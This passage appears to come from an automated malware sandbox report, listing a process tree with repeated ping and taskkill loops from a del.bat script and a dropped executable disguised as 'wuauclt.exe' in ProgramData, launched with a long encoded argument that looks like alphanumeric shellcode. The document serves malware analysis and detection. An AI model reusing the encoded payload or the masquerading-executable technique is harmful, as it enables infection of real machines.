    - Runs ping.exe
    PID:3728
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4400
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4308
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4276
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1656
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4136
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4584
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4484
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - Runs ping.exe
    PID:216
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3804
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1188
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - Runs ping.exe
    PID:4640
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1276
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - Runs ping.exe
    PID:4340
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3424
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2136
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4452
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2144
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2872
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3064
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3060
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4364
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:4124
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3892
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:868
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3276
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1172
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:4992
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4904
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:2972
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:376
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    PID:936
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3184
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:1940
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2436
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:4416
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3264
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    PID:312
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3664
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:2120
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2008
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1692
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:3388
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4868
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:4764
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - Runs ping.exe
    PID:4352
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:3772
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3920
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1320
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1440
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:4876
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2176
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    PID:1680
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3384
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:756
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2632
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:2116
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1048
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2344
- C:\ProgramData\IMEJP10\wuauclt.exe
  C:\ProgramData\IMEJP10\wuauclt.exe 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 [0] 4424 PC@
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  PID:1064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\del.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1684
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3936
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3536
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3116
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:8
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3232
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3492
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4896
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:4400
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4428
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1584
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:864
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4560
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4608
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3184
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1852
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4032
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4752
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4696
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4596
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2816
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1400
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\taskkill.exe
    Taskkill /F /pid 4424
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1376
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4520
